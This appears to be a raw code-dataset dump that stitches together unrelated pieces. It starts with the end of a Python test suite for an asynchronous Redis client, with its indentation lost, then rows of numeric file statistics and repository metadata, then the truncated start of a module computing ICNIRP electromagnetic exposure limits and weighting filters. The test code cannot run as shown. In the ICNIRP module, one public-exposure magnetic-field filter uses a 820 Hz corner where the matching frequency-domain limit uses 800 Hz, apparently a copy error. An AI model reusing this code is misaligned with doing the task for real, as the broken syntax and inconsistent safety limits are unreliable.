res = yield gen.Task(self.client.getset, 'a', 2)
self.assertEqual(res, '1')
res = yield gen.Task(self.client.get, 'a')
self.assertEqual(res, '2')
self.stop()
@async_test
@gen.engine
def test_hash(self):
res = yield gen.Task(self.client.hmset, 'foo', {'a': 1, 'b': 2})
self.assertEqual(res, True)
res = yield gen.Task(self.client.hgetall, 'foo')
self.assertEqual(res, {'a': '1', 'b': '2'})
res = yield gen.Task(self.client.hdel, 'foo', 'a')
self.assertEqual(res, True)
res = yield gen.Task(self.client.hgetall, 'foo')
self.assertEqual(res, {'b': '2'})
res = yield gen.Task(self.client.hget, 'foo', 'a')
self.assertEqual(res, '')
res = yield gen.Task(self.client.hget, 'foo', 'b')
self.assertEqual(res, '2')
res = yield gen.Task(self.client.hlen, 'foo')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.hincrby, 'foo', 'b', 3)
self.assertEqual(res, 5)
res = yield gen.Task(self.client.hkeys, 'foo')
self.assertEqual(res, ['b'])
res = yield gen.Task(self.client.hvals, 'foo')
self.assertEqual(res, ['5'])
res = yield gen.Task(self.client.hset, 'foo', 'a', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.hmget, 'foo', ['a', 'b'])
self.assertEqual(res, {'a': '1', 'b': '5'})
res = yield gen.Task(self.client.hexists, 'foo', 'b')
self.assertEqual(res, True)
self.stop()
@async_test
@gen.engine
def test_incrdecr(self):
res = yield gen.Task(self.client.incr, 'foo')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.incrby, 'foo', 10)
self.assertEqual(res, 11)
res = yield gen.Task(self.client.decr, 'foo')
self.assertEqual(res, 10)
res = yield gen.Task(self.client.decrby, 'foo', 10)
self.assertEqual(res, 0)
res = yield gen.Task(self.client.decr, 'foo')
self.assertEqual(res, -1)
self.stop()
@async_test
@gen.engine
def test_ping(self):
res = yield gen.Task(self.client.ping)
self.assertEqual(res, True)
self.stop()
@async_test
@gen.engine
def test_lists(self):
res = yield gen.Task(self.client.lpush, 'foo', 1)
self.assertEqual(res, True)
res = yield gen.Task(self.client.llen, 'foo')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.lrange, 'foo', 0, -1)
self.assertEqual(res, ['1'])
res = yield gen.Task(self.client.rpop, 'foo')
self.assertEqual(res, '1')
res = yield gen.Task(self.client.llen, 'foo')
self.assertEqual(res, 0)
self.stop()
@async_test
@gen.engine
def test_brpop(self):
res = yield gen.Task(self.client.lpush, 'foo', 'ab')
self.assertEqual(res, True)
res = yield gen.Task(self.client.lpush, 'bar', 'cd')
self.assertEqual(res, True)
res = yield gen.Task(self.client.brpop, ['foo', 'bar'], 1)
self.assertEqual(res, {'foo': 'ab'})
res = yield gen.Task(self.client.llen, 'foo')
self.assertEqual(res, 0)
res = yield gen.Task(self.client.llen, 'bar')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.brpop, ['foo', 'bar'], 1)
self.assertEqual(res, {'bar': 'cd'})
self.stop()
@async_test
@gen.engine
def test_brpoplpush(self):
res = yield gen.Task(self.client.lpush, 'foo', 'ab')
self.assertEqual(res, True)
res = yield gen.Task(self.client.lpush, 'bar', 'cd')
self.assertEqual(res, True)
res = yield gen.Task(self.client.lrange, 'foo', 0, -1)
self.assertEqual(res, ['ab'])
res = yield gen.Task(self.client.lrange, 'bar', 0, -1)
self.assertEqual(res, ['cd'])
res = yield gen.Task(self.client.brpoplpush, 'foo', 'bar')
self.assertEqual(res, 'ab')
res = yield gen.Task(self.client.llen, 'foo')
self.assertEqual(res, 0)
res = yield gen.Task(self.client.lrange, 'bar', 0, -1)
self.assertEqual(res, ['ab', 'cd'])
self.stop()
@async_test
@gen.engine
def test_sets(self):
res = yield gen.Task(self.client.smembers, 'foo')
self.assertEqual(res, set())
res = yield gen.Task(self.client.sadd, 'foo', 'a')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'foo', 'b')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'foo', 'c')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.srandmember, 'foo')
self.assertIn(res, ['a', 'b', 'c'])
res = yield gen.Task(self.client.scard, 'foo')
self.assertEqual(res, 3)
res = yield gen.Task(self.client.srem, 'foo', 'a')
self.assertEqual(res, True)
res = yield gen.Task(self.client.smove, 'foo', 'bar', 'b')
self.assertEqual(res, True)
res = yield gen.Task(self.client.smembers, 'bar')
self.assertEqual(res, set(['b']))
res = yield gen.Task(self.client.sismember, 'foo', 'c')
self.assertEqual(res, True)
res = yield gen.Task(self.client.spop, 'foo')
self.assertEqual(res, 'c')
self.stop()
@async_test
@gen.engine
def test_sets2(self):
res = yield gen.Task(self.client.sadd, 'foo', 'a')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'foo', 'b')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'foo', 'c')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'bar', 'b')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'bar', 'c')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'bar', 'd')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sdiff, ['foo', 'bar'])
self.assertEqual(res, set(['a']))
res = yield gen.Task(self.client.sdiff, ['bar', 'foo'])
self.assertEqual(res, set(['d']))
res = yield gen.Task(self.client.sinter, ['foo', 'bar'])
self.assertEqual(res, set(['b', 'c']))
res = yield gen.Task(self.client.sunion, ['foo', 'bar'])
self.assertEqual(res, set(['a', 'b', 'c', 'd']))
self.stop()
@async_test
@gen.engine
def test_sets3(self):
res = yield gen.Task(self.client.sadd, 'foo', 'a')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'foo', 'b')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'foo', 'c')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'bar', 'b')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'bar', 'c')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sadd, 'bar', 'd')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.sdiffstore, ['foo', 'bar'], 'zar')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.smembers, 'zar')
self.assertEqual(res, set(['a']))
res = yield gen.Task(self.client.delete, 'zar')
self.assertEqual(res, True)
res = yield gen.Task(self.client.sinterstore, ['foo', 'bar'], 'zar')
self.assertEqual(res, 2)
res = yield gen.Task(self.client.smembers, 'zar')
self.assertEqual(res, set(['b', 'c']))
res = yield gen.Task(self.client.delete, 'zar')
self.assertEqual(res, True)
res = yield gen.Task(self.client.sunionstore, ['foo', 'bar'], 'zar')
self.assertEqual(res, 4)
res = yield gen.Task(self.client.smembers, 'zar')
self.assertEqual(res, set(['a', 'b', 'c', 'd']))
self.stop()
@async_test
@gen.engine
def test_zsets(self):
res = yield gen.Task(self.client.zadd, 'foo', 1, 'a')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'foo', 2, 'b')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zscore, 'foo', 'a')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zscore, 'foo', 'b')
self.assertEqual(res, 2)
res = yield gen.Task(self.client.zrank, 'foo', 'a')
self.assertEqual(res, 0)
res = yield gen.Task(self.client.zrank, 'foo', 'b')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zrevrank, 'foo', 'a')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zrevrank, 'foo', 'b')
self.assertEqual(res, 0)
res = yield gen.Task(self.client.zincrby, 'foo', 'a', 1)
self.assertEqual(res, 2)
res = yield gen.Task(self.client.zincrby, 'foo', 'b', 1)
self.assertEqual(res, 3)
res = yield gen.Task(self.client.zscore, 'foo', 'a')
self.assertEqual(res, 2)
res = yield gen.Task(self.client.zscore, 'foo', 'b')
self.assertEqual(res, 3)
res = yield gen.Task(self.client.zrange, 'foo', 0, -1, True)
self.assertEqual(res, [('a', 2.0), ('b', 3.0)])
res = yield gen.Task(self.client.zrange, 'foo', 0, -1, False)
self.assertEqual(res, ['a', 'b'])
res = yield gen.Task(self.client.zrevrange, 'foo', 0, -1, True,)
self.assertEqual(res, [('b', 3.0), ('a', 2.0)])
res = yield gen.Task(self.client.zrevrange, 'foo', 0, -1, False)
self.assertEqual(res, ['b', 'a'])
res = yield gen.Task(self.client.zcard, 'foo')
self.assertEqual(res, 2)
res = yield gen.Task(self.client.zadd, 'foo', 3.5, 'c')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zrangebyscore, 'foo', '-inf', '+inf',
None, None, False)
self.assertEqual(res, ['a', 'b', 'c'])
res = yield gen.Task(self.client.zrangebyscore, 'foo', '2.1', '+inf',
None, None, True)
self.assertEqual(res, [('b', 3.0), ('c', 3.5)])
res = yield gen.Task(self.client.zrangebyscore, 'foo', '-inf', '3.0',
0, 1, False)
self.assertEqual(res, ['a'])
res = yield gen.Task(self.client.zrangebyscore, 'foo', '-inf', '+inf',
1, 2, False)
self.assertEqual(res, ['b', 'c'])
res = yield gen.Task(self.client.delete, 'foo')
self.assertEqual(res, True)
res = yield gen.Task(self.client.zadd, 'foo', 1, 'a')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'foo', 2, 'b')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'foo', 3, 'c')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'foo', 4, 'd')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zremrangebyrank, 'foo', 2, 4)
self.assertEqual(res, 2)
res = yield gen.Task(self.client.zremrangebyscore, 'foo', 0, 2)
self.assertEqual(res, 2)
res = yield gen.Task(self.client.zadd, 'a', 1, 'a1')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'a', 1, 'a2')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'a', 1, 'a3')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'b', 2, 'a1')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'b', 2, 'a3')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'b', 2, 'a4')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'c', 6, 'a1')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'c', 5, 'a3')
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zadd, 'c', 4, 'a4')
self.assertEqual(res, 1)
# ZINTERSTORE
# sum, no weight
res = yield gen.Task(self.client.zinterstore, 'z', ['a', 'b', 'c'])
self.assertEqual(res, 2)
res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
self.assertEqual(res, [('a3', 8), ('a1', 9)])
# max, no weight
res = yield gen.Task(self.client.zinterstore, 'z', ['a', 'b', 'c'],
aggregate='MAX')
self.assertEqual(res, 2)
res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
self.assertEqual(res, [('a3', 5), ('a1', 6)])
# with weight
res = yield gen.Task(self.client.zinterstore, 'z',
{'a': 1, 'b': 2, 'c': 3})
self.assertEqual(res, 2)
res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
self.assertEqual(res, [('a3', 20), ('a1', 23)])
# ZUNIONSTORE
# sum, no weight
res = yield gen.Task(self.client.zunionstore, 'z', ['a', 'b', 'c'])
self.assertEqual(res, 4)
res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
self.assertEqual(dict(res), dict(a1=9, a2=1, a3=8, a4=6))
# max, no weight
res = yield gen.Task(self.client.zunionstore, 'z', ['a', 'b', 'c'],
aggregate='MAX')
self.assertEqual(res, 4)
res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
self.assertEqual(dict(res), dict(a1=6, a2=1, a3=5, a4=4))
# with weight
res = yield gen.Task(self.client.zunionstore, 'z',
{'a': 1, 'b': 2, 'c': 3})
self.assertEqual(res, 4)
res = yield gen.Task(self.client.zrange, 'z', 0, -1, with_scores=True)
self.assertEqual(dict(res), dict(a1=23, a2=1, a3=20, a4=16))
self.stop()
@async_test
@gen.engine
def test_zset(self):
NUM = 100
long_list = map(str, xrange(0, NUM))
for i in long_list:
res = yield gen.Task(self.client.zadd, 'foobar', i, i)
self.assertEqual(res, 1)
res = yield gen.Task(self.client.zrange, 'foobar', 0, NUM,
with_scores=False)
self.assertEqual(res, long_list)
self.stop()
@gen.engine
def _make_list(self, key, items, callback=None):
yield gen.Task(self.client.delete, key)
for i in items:
yield gen.Task(self.client.rpush, key, i)
callback(True)
@async_test
@gen.engine
def test_sort(self):
res = yield gen.Task(self.client.sort, 'a')
self.assertEqual(res, [])
yield gen.Task(self._make_list, 'a', '3214')
res = yield gen.Task(self.client.sort, 'a')
self.assertEqual(res, ['1', '2', '3', '4'])
res = yield gen.Task(self.client.sort, 'a', start=1, num=2)
self.assertEqual(res, ['2', '3'])
res = yield gen.Task(self.client.set, 'score:1', 8)
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'score:2', 3)
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'score:3', 5)
self.assertEqual(res, True)
yield gen.Task(self._make_list, 'a_values', '123')
res = yield gen.Task(self.client.sort, 'a_values', by='score:*')
self.assertEqual(res, ['2', '3', '1'])
res = yield gen.Task(self.client.set, 'user:1', 'u1')
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'user:2', 'u2')
self.assertEqual(res, True)
res = yield gen.Task(self.client.set, 'user:3', 'u3')
self.assertEqual(res, True)
yield gen.Task(self._make_list, 'a', '231')
res = yield gen.Task(self.client.sort, 'a', get='user:*')
self.assertEqual(res, ['u1', 'u2', 'u3'])
yield gen.Task(self._make_list, 'a', '231')
res = yield gen.Task(self.client.sort, 'a', desc=True)
self.assertEqual(res, ['3', '2', '1'])
yield gen.Task(self._make_list, 'a', 'ecdba')
res = yield gen.Task(self.client.sort, 'a', alpha=True)
self.assertEqual(res, ['a', 'b', 'c', 'd', 'e'])
yield gen.Task(self._make_list, 'a', '231')
res = yield gen.Task(self.client.sort, 'a', store='sorted_values')
self.assertEqual(res, 3)
res = yield gen.Task(self.client.lrange, 'sorted_values', 0, -1)
self.assertEqual(res, ['1', '2', '3'])
yield gen.Task(self.client.set, 'user:1:username', 'zeus')
yield gen.Task(self.client.set, 'user:2:username', 'titan')
yield gen.Task(self.client.set, 'user:3:username', 'hermes')
yield gen.Task(self.client.set, 'user:4:username', 'hercules')
yield gen.Task(self.client.set, 'user:5:username', 'apollo')
yield gen.Task(self.client.set, 'user:6:username', 'athena')
yield gen.Task(self.client.set, 'user:7:username', 'hades')
yield gen.Task(self.client.set, 'user:8:username', 'dionysus')
yield gen.Task(self.client.set, 'user:1:favorite_drink', 'yuengling')
yield gen.Task(self.client.set, 'user:2:favorite_drink', 'rum')
yield gen.Task(self.client.set, 'user:3:favorite_drink', 'vodka')
yield gen.Task(self.client.set, 'user:4:favorite_drink', 'milk')
yield gen.Task(self.client.set, 'user:5:favorite_drink', 'pinot noir')
yield gen.Task(self.client.set, 'user:6:favorite_drink', 'water')
yield gen.Task(self.client.set, 'user:7:favorite_drink', 'gin')
yield gen.Task(self.client.set, 'user:8:favorite_drink', 'apple juice')
yield gen.Task(self._make_list, 'gods', '12345678')
res = yield gen.Task(self.client.sort, 'gods',
start=2,
num=4,
by='user:*:username',
get='user:*:favorite_drink',
desc=True,
alpha=True,
store='sorted')
self.assertEqual(res, 4)
res = yield gen.Task(self.client.lrange, 'sorted', 0, -1)
self.assertEqual(res, ['vodka', 'milk', 'gin', 'apple juice'])
self.stop()
@async_test
@gen.engine
def test_bit_commands(self):
key = 'TEST_BIT'
res = yield gen.Task(self.client.setbit, key, 3, 1)
self.assertFalse(res)
res = yield gen.Task(self.client.getbit, key, 0)
self.assertFalse(res)
res = yield gen.Task(self.client.getbit, key, 3)
self.assertTrue(res)
res = yield gen.Task(self.client.setbit, key, 3, 0)
self.assertTrue(res)
res = yield gen.Task(self.client.getbit, key, 1)
self.assertFalse(res)
self.stop()
| 39.385057
| 79
| 0.56592
| 3,745
| 27,412
| 4.111615
| 0.06008
| 0.128848
| 0.193272
| 0.257696
| 0.884595
| 0.865177
| 0.838291
| 0.791986
| 0.710936
| 0.669308
| 0
| 0.018232
| 0.26565
| 27,412
| 695
| 80
| 39.441727
| 0.746696
| 0.005472
| 0
| 0.577107
| 0
| 0
| 0.05295
| 0.006935
| 0
| 0
| 0
| 0
| 0.349762
| 1
| 0.054054
| false
| 0
| 0.004769
| 0
| 0.060413
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
90893b90dc72a853a3f40b831767378604cf8496
| 25,779
|
py
|
Python
|
icnirp.py
|
giaccone/exposure
|
968545c98eeb00c5d65b11026d29779f7b459009
|
[
"MIT"
] | null | null | null |
icnirp.py
|
giaccone/exposure
|
968545c98eeb00c5d65b11026d29779f7b459009
|
[
"MIT"
] | null | null | null |
icnirp.py
|
giaccone/exposure
|
968545c98eeb00c5d65b11026d29779f7b459009
|
[
"MIT"
] | null | null | null |
# load modules
import numpy as np
def icnirp_limit(f, year, receptor, quantity):
"""
INCIRP_LIMIT provides basic restrictions or reference levels according to the ICNIRP guidelines.
Parameters
----------
f (float, ndarray):
frequency range
year (str):
reference guidelines. '1998' or '2010'
receptor (str):
'occupational' or 'public'
quantity (str):
'B', 'J', 'Ecns' or 'Epns' (to be defined according to the guidelines)
Returns
-------
return (float, ndarray):
limit (N.B. always in S.I. unit)
AUTHOR: Luca Giaccone (luca.giaccone@polito.it)
DATE: 23.02.2016
HISTORY:
"""
if isinstance(f,(int,float)):
f = np.array([f])
# Initialize output
limit = np.zeros(f.shape)
# Get limits according to input
if year == '1998':
if receptor == 'occupational':
if quantity == 'B':
limit[f < 1] = 0.2
limit[(f >= 1) & (f < 8)] = 0.2/f[(f >= 1) & (f < 8)]**2
limit[(f >= 8) & (f < 25)] = 0.025/f[(f >= 8) & (f < 25)]
limit[(f >= 25) & (f < 820)] = 25e-6/(f[(f >= 25) & (f < 820)]*1e-3)
limit[(f >= 820) & (f < 65e3)] = 30.7e-6
limit[(f >= 65e3) & (f < 1e6)] = 2e-6/(f[(f >= 65e3) & (f < 1e6)]*1e-6)
limit[(f >= 1e6) & (f < 10e6)] = 2e-6/(f[(f >= 1e6) & (f < 10e6)]*1e-6)
limit[(f >= 10e6) & (f < 400e6)] = 0.2e-6
limit[(f >= 400e6) & (f < 2000e6)] = 0.01e-6*np.sqrt(f[(f >= 400e6) & (f < 2000e6)]*1e-6)
limit[(f >= 2000e6) & (f <= 300e9)] = 0.45e-6
elif quantity == 'J':
limit[f < 1] = 40 * 1e-3
limit[(f >= 1) & (f < 4)] = 40*1e-3/f[(f >= 1) & (f < 4)]
limit[(f >= 4) & (f < 1000)] = 10*1e-3
limit[(f >= 1000) & (f < 100e3)] = f[(f >= 1000) & (f < 100e3)]/100*1e-3
limit[(f >= 100e3) & (f <= 10e6)] = f[(f >= 100e3) & (f <= 10e6)]/100 * 1e-3
elif receptor == 'public':
if quantity == 'B':
limit[f < 1] = 4e-2
limit[(f >= 1) & (f < 8)] = 4e-2 / f[(f >= 1) & (f < 8)] ** 2
limit[(f >= 8) & (f < 25)] = 5e-3 / f[(f >= 8) & (f < 25)]
limit[(f >= 25) & (f < 800)] = 5e-6 / (f[(f >= 25) & (f < 800)] * 1e-3)
limit[(f >= 800) & (f < 3000)] = 6.25e-6
limit[(f >= 3000) & (f < 150e3)] = 6.25e-6
limit[(f >= 150e3) & (f < 1e6)] = 0.92e-6 / (f[(f >= 150e3) & (f < 1e6)] * 1e-6)
limit[(f >= 1e6) & (f < 10e6)] = 0.92e-6 / (f[(f >= 1e6) & (f < 10e6)] * 1e-6)
limit[(f >= 10e6) & (f < 400e6)] = 0.092e-6
limit[(f >= 400e6) & (f < 2000e6)] = 0.0046e-6 * np.sqrt(f[(f >= 400e6) & (f < 2000e6)] * 1e-6)
limit[(f >= 2000e6) & (f <= 300e9)] = 0.2e-6
elif quantity == 'J':
limit[f < 1] = 8*1e-3
limit[(f >= 1) & (f < 4)] = 8*1e-3 / f[(f >= 1) & (f < 4)]
limit[(f >= 4) & (f < 1000)] = 2*1e-3
limit[(f >= 1000) & (f < 100e3)] = f[(f >= 1000) & (f < 100e3)] / 500 * 1e-3
limit[(f >= 100e3) & (f <= 10e6)] = f[(f >= 100e3) & (f <= 10e6)] / 500 * 1e-3
elif year == '2010':
if receptor == 'occupational':
if quantity == 'B':
limit[(f >= 1) & (f < 8)] = 0.2 / f[(f >= 1) & (f < 8)] ** 2
limit[(f >= 8) & (f < 25)] = 2.5e-2 / f[(f >= 8) & (f < 25)]
limit[(f >= 25) & (f < 300)] = 1e-3
limit[(f >= 300) & (f < 3000)] = 0.3 / f[(f >= 300) & (f < 3000)]
limit[(f >= 3000) & (f <= 10e6)] = 1e-4
elif quantity == 'Ecns':
limit[(f >= 1) & (f < 10)] = 0.5 / f[(f >= 1) & (f < 10)]
limit[(f >= 10) & (f < 25)] = 0.05
limit[(f >= 25) & (f < 400)] = 2e-3 * f[(f >= 25) & (f < 400)]
limit[(f >= 400) & (f < 3000)] = 0.8
limit[(f >= 3000) & (f <= 10e6)] = 2.7e-4 * f[(f >= 3000) & (f <= 10e6)]
elif quantity == 'Epns':
limit[(f >= 1) & (f < 3000)] = 0.8
limit[(f >= 3000) & (f <= 10e6)] = 2.7e-4 * f[(f >= 3000) & (f <= 10e6)]
elif receptor == 'public':
if quantity == 'B':
limit[(f >= 1) & (f < 8)] = 4e-2 / f[(f >= 1) & (f < 8)] ** 2
limit[(f >= 8) & (f < 25)] = 5e-3 / f[(f >= 8) & (f < 25)]
limit[(f >= 25) & (f < 50)] = 2e-4
limit[(f >= 50) & (f < 400)] = 2e-4
limit[(f >= 400) & (f < 3000)] = 8e-2 / f[(f >= 400) & (f < 3000)]
limit[(f >= 3000) & (f <= 10e6)] = 2.7e-5
elif quantity == 'Ecns':
limit[(f >= 1) & (f < 10)] = 0.1 / f[(f >= 1) & (f < 10)]
limit[(f >= 10) & (f < 25)] = 0.01
limit[(f >= 25) & (f < 1000)] = 4e-4 * f[(f >= 25) & (f < 1000)]
limit[(f >= 1000) & (f < 3000)] = 0.4
limit[(f >= 3000) & (f <= 10e6)] = 1.35e-4 * f[(f >= 3000) & (f <= 10e6)]
elif quantity == 'Epns':
limit[(f >= 1) & (f < 3000)] = 0.4
limit[(f >= 3000) & (f <= 10e6)] = 1.35e-4 * f[(f >= 3000) & (f <= 10e6)]
if limit.size == 1:
limit = np.ndarray.item(limit)
return limit
def icnirp_filter(year, receptor, quantity, domain, f=None, rc_series=None):
"""
Parameters
----------
year (str):
ICNIRP guidelines publication yeare, '1998' or '2010'
receptor (str):
'occupational' or 'public'
quantity (str):
string defining the phisical quantity (e.g. 'B', 'J', 'Ecns', 'Epns')
domain (str):
'freq' or 'time'
f (ndarray):
input required when domain='freq'. It defines the frequency values where
the filter has to be defined
rc_series (ndarray):
optional input that can be used with year='1998'. It takes into
account also the filter variotion (magnitude/phase) at extremely
low frequency
Returns
-------
num (ndarray):
numerator of the filter
den (ndarray):
denominator of the filter
AUTHOR: Luca Giaccone (luca.giaccone@polito.it)
DATE: 23.11.2019
HISTORY:
"""
if year == '1998':
if receptor == 'occupational':
if quantity == 'B':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[f < 1] = 1 / (0.2 * np.sqrt(2))
weight_fun[(f >= 1) & (f < 8)] = 1 / (0.2 / f[(f >= 1) & (f < 8)] ** 2 * np.sqrt(2))
weight_fun[(f >= 8) & (f < 25)] = 1 / (0.025 / f[(f >= 8) & (f < 25)] * np.sqrt(2))
weight_fun[(f >= 25) & (f < 820)] = 1 / (25e-6 / (f[(f >= 25) & (f < 820)] * 1e-3) * np.sqrt(2))
weight_fun[f >= 820] = 1 / (30.7e-6 * np.sqrt(2))
phase[f < 820] = 90 * isgn[f < 820]
elif domain == 'time':
if rc_series == 'y':
# angular frequencies
a = 2 * np.pi * 8
b = 2 * np.pi * 820
fref = np.array([1e4])
s = 2j * np.pi * fref
Href = (s ** 2) / ((s + a) * (s + b))
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k, 0, 0])
den = np.array([1, (a + b), (a * b)])
else:
# angular frequency
a = 2 * np.pi * 820
# filter parameters
fref = np.array([1e4])
s = 2j * np.pi * fref
Href = s / (s + a)
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k, 0])
den = np.array([1, a])
elif quantity == 'J':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[f < 1] = 1 / (40 * 1e-3 * np.sqrt(2))
weight_fun[(f >= 1) & (f < 4)] = 1 / (40 * 1e-3 / f[(f >= 1) & (f < 4)] * np.sqrt(2))
weight_fun[(f >= 4) & (f < 1000)] = 1 / (10 * 1e-3 * np.sqrt(2))
weight_fun[(f >= 1000) & (f < 100e3)] = 1 / (f[(f >= 1000) & (f < 100e3)] / 100 * 1e-3 * np.sqrt(2))
weight_fun[(f >= 100e3) & (f < 10e6)] = 1 / (f[(f >= 100e3) & (f < 10e6)] / 100 * 1e-3 * np.sqrt(2))
phase[f > 1000] = -90 * isgn[f > 1000]
elif domain == 'time':
if rc_series == 'y':
# angular frequencies
a = 2 * np.pi * 1
b = 2 * np.pi * 4
c = 2 * np.pi * 1000
# filter parameters
fref = np.array([1e5])
s = 2j * np.pi * fref
Href = (s + a) / ((s + b) * (s + c))
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k, (k * a)])
den = np.array([1, (b + c), (b * c)])
else:
# angular frequency
a = 2 * np.pi * 1000
# filter parameters
fref = np.array([1e5])
s = 2j * np.pi * fref
Href = 1 / (s + a)
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k])
den = np.array([1, a])
elif receptor == 'public':
if quantity == 'B':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[f < 1] = 1 / (4e-2 * np.sqrt(2))
weight_fun[(f >= 1) & (f < 8)] = 1 / (4e-2 / f[(f >= 1) & (f < 8)] ** 2 * np.sqrt(2))
weight_fun[(f >= 8) & (f < 25)] = 1 / (5e-3 / f[(f >= 8) & (f < 25)] * np.sqrt(2))
weight_fun[(f >= 25) & (f < 800)] = 1 / (5e-6 / (f[(f >= 25) & (f < 800)] * 1e-3) * np.sqrt(2))
weight_fun[f >= 800] = 1 / (6.25e-6 * np.sqrt(2))
phase[f < 800] = 90 * isgn[f < 800]
elif domain == 'time':
if rc_series == 'y':
# angular frequencies
a = 2 * np.pi * 8
b = 2 * np.pi * 800
# filter parameters
fref = np.array([1e4])
s = 2j * np.pi * fref
Href = (s ** 2) / ((s + a) * (s + b))
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k, 0, 0])
den = np.array([1, (a + b), (a * b)])
else:
# angular frequency
a = 2 * np.pi * 820
# filter parameters
fref = np.array([1e4])
s = 2j * np.pi * fref
Href = s / (s + a)
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k, 0])
den = np.array([1, a])
elif quantity == 'J':
if domain == 'freq':
# get sign
isgn = np.sign(f)
f = np.abs(f)
# Initialize output
weight_fun = np.zeros(f.shape)
phase = np.zeros(f.shape)
weight_fun[f < 1] = 1 / (8 * 1e-3 * np.sqrt(2))
weight_fun[(f >= 1) & (f < 4)] = 1 / (8 * 1e-3 / f[(f >= 1) & (f < 4)] * np.sqrt(2))
weight_fun[(f >= 4) & (f < 1000)] = 1 / (2 * 1e-3 * np.sqrt(2))
weight_fun[(f >= 1000) & (f < 100e3)] = 1 / (f[(f >= 1000) & (f < 100e3)] / 500 * 1e-3 * np.sqrt(2))
weight_fun[(f >= 100e3) & (f < 10e6)] = 1 / (f[(f >= 100e3) & (f < 10e6)] / 500 * 1e-3 * np.sqrt(2))
phase[f > 1000] = -90 * isgn[f > 1000]
elif domain == 'time':
if rc_series == 'y':
# angular frequencies
a = 2 * np.pi * 1
b = 2 * np.pi * 4
c = 2 * np.pi * 1000
# filter parameters
fref = np.array([1e5])
s = 2j * np.pi * fref
Href = (s + a) / ((s + b) * (s + c))
lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
k = (1.0 / (lim_ref * np.abs(Href))).item()
# define numerator and denominator
num = np.array([k, (k * a)])
den = np.array([1, (b + c), (b * c)])
else:
# angular frequencies
a = 2 * np.pi * 1000
# filter parameters
fref = np.array([1e5])
s = 2j * np.pi * fref
Href = 1 / (s + a)
